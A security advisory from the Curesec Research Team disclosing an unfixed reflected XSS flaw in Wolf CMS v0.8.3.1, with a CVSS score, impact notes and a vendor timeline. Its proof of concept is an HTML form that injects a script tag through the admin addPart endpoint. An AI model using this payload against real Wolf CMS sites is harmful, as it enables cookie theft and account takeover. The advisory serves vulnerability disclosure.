Wolf CMS v0.8.3.1: XSS

Wolf CMS v0.8.3.1: XSS

Date: 2016-01-28 09:50:14
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Wolf CMS v0.8.3.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://www.wolfcms.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 12/10/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Wolf CMS is a content management system written in PHP. In version, it is vulnerable to reflected XSS.

The vulnerability can lead to the stealing of cookies, injection of JavaScript keyloggers, or the bypassing of CSRF protection. If the victim is in the Editor role, successful exploitation may lead to code execution via a different vulnerability in the same version of Wolf CMS.

3. Proof of Concept

<html> <body> <form action="http://localhost/wolfcms/?/admin/page/addPart" method="POST"> <input type="hidden" name="part[index]" value=""><script>alert(1)</script>" /> <input type="hidden" name="part[name]" value="hihuk" /> <input type="submit" value="Submit request" /> </form> </body> </html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

12/10/2015 Informed Vendor about Issue (no reply)
01/10/2016 Reminded Vendor of Disclosure Date (no reply)
01/28/2016 Disclosed to public